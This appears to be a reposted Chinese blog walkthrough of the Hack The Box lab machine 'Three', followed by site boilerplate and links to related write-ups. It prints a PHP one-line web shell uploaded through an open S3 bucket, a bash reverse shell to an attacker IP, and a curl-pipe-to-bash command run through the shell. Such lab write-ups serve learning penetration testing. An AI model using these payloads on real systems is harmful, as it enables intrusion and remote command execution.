1. Toy模板网首页
  2. > Toy博客

Hack The Box - Three(新手友好)

8月前 作者:觉醒猴子 分类:Toy博客 阅读(24) 违法举报

这篇具有很好参考价值的文章主要介绍了Hack The Box - Three(新手友好)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境给了一个IP,nmap信息搜集一波

nmap -sS -sV 10.129.126.35
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  httpApache httpd 2.4.29 ((Ubuntu))

访问10.129.126.35:80,收集有用信息(渗透测试==信息收集)

Phone: +01 343 123 6102
Email: mail@thetoppers.htb

thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。

echo "10.129.126.35 thetoppers.htb" | tee -a /etc/hosts

再次访问和之前页面一样,尝试子域名爆破,有没有其他突破口

gobuster vhost -w /usr/share/wordlists/dict/subnames.txt -u http://thetoppers.htb

爆破的很久最终爆破结果有s3.thetoppers.htb,加hosts

echo "10.129.126.35 s3.thetoppers.htb" | tee -a /etc/hosts

页面只有一条json信息。看看s3,s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。

{"status": "running"}

我们就可以通过awscli来与s3进行交互,安装并将所有字段随意配置(服务器可能不校验)。

aws configure

列出所有s3的桶

aws --endpoint=http://s3.thetoppers.htb s3 ls

列出该s3下的目录及对象

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

创建一句话shell

echo'<?php system($_GET["cmd"]); ?>' > shell.php

使用cp命令拷贝到s3的桶里

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

访问http://thetoppers.htb/shell.php?cmd=ls可以看到thetoppers.htb桶里的目录及对象

images index.php shell.php

我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。查看本机ip
ifconfig //10.10.16.60
生成bash一句话shell.sh

#!/bin/bash
bash-i >& /dev/tcp/10.10.16.60/1337 0>&1

nc监听端口

nc -nvlp 1337

python创建简易服务器

python3 -m http.server 8090

目标机curl本机bash文件并执行

http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.60:8090/shell.sh%20|%20bash

如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件

Hack The Box - Three(新手友好)www目录catflag即可。文章来源地址https://www.toymoban.com/news/detail-470942.html

到了这里,关于Hack The Box - Three(新手友好)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • Hack The Box - 关卡Dancing

    Hack The Box - 关卡Dancing

    SMB(全称是Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居就是靠它实现的。 SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务

    2024年02月06日
    浏览(30)
  • 【Hack The Box】windows练习-- legacy

    【Hack The Box】windows练习-- legacy

    【Hack The Box】windows练习-- legacy 🔥系列专栏:Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年9月7日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! 信息收集的手法与linux一致 namo即可 发现存在的服务是445,并且nmap跑出来的是winxp 或者200

    2024年02月09日
    浏览(35)
  • 【Hack The Box】windows练习-- devel

    【Hack The Box】windows练习-- devel

    【Hack The Box】windows练习-- devel 🔥系列专栏:Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年10月28日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! ftp允许匿名登陆 还有一个80页面 匿名登陆 Anonymous 发现有一个图片,get下载到本地之后发现

    2024年02月08日
    浏览(32)
  • Hack The Box-Sherlocks-Tracer

    Hack The Box-Sherlocks-Tracer

    A junior SOC analyst on duty has reported multiple alerts indicating the presence of PsExec on a workstation. They verified the alerts and escalated the alerts to tier II. As an Incident responder you triaged the endpoint for artefacts of interest. Now please answer the questions regarding this security event so you can report it to your incident manager. 一名

    2024年01月20日
    浏览(22)
  • Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified

    Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified

    这个阶段的,终于不是之前的傻乎乎操作了,到这我才知道,那些问答不是先问答再渗透的。原来是渗透一步回答相应问题,这里涉及到了许多工具、脚本、提权、端口等知识点,收获丰富。 TASK 1 Which TCP port is hosting a database server? 哪个 TCP 端口托管数据库服务器? 答案:1

    2024年02月05日
    浏览(37)
  • Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程

    Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程

    数据库介绍............................................................................................................... 3 数据库管理系统(DBMS)介绍........................................................................... 3 数据库的类型..................................................................................................

    2024年02月04日
    浏览(25)
  • 【新手友好】用Pyspark和GraphX解析复杂网络数据

    【新手友好】用Pyspark和GraphX解析复杂网络数据

    在本文中,我们将详细介绍如何在Python / pyspark环境中使用graphx进行图计算。GraphX是Spark提供的图计算API,它提供了一套强大的工具,用于处理和分析大规模的图数据。通过结合Python / pyspark和graphx,您可以轻松地进行图分析和处理。 为了方便那些刚入门的新手,包括我自己在

    2024年01月19日
    浏览(38)
  • vscode如何创建并打开html文件(骨灰级新手友好)

    vscode如何创建并打开html文件(骨灰级新手友好)

    目录 一、 在VSCode下载相关插件  二、 创建html文件 三、 html运行在浏览器上 四、 快捷创建骨架 1. 先打开Visual Studio Code 2. 下载三个插件 ,点击第五个图标 Chinese (Simplified) (简体中文) HTML Play open in browser  下载完 Chinese (Simplified) (简体中文),重启后发现就变成中文(对于原来

    2024年02月11日
    浏览(31)
  • 记录--什么!一个项目给了8个字体包???

    记录--什么!一个项目给了8个字体包???

    在一个新项目中,设计统一了项目中所有的字体,并提供了字体包。在项目中需要按需引入这些字体包。 首先,字体包的使用分为了以下几种情况: 无特殊要求的语言使用字体A,阿拉伯语言使用字体B; 加粗、中等、常规、偏细四种样式,AB两种字体分别对应使用 Bold 、 M

    2024年02月12日
    浏览(30)

  • 盘点 Python 中字符串的常用操作,对新手极度友好

    在 Python 中字符串的表达方式有四种 一对单引号 一对双引号 一对三个单引号 一对三个双引号 a = ‘abc’ b= “abc” c = ‘’‘abc’‘’ d = “”“abc”“” print(type(a)) # class ‘str’ print(type(b)) # class ‘str’ print(type©) # class ‘str’ print(type(d)) # class ‘str’ 单双引号混合使用 a

    2024年02月10日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包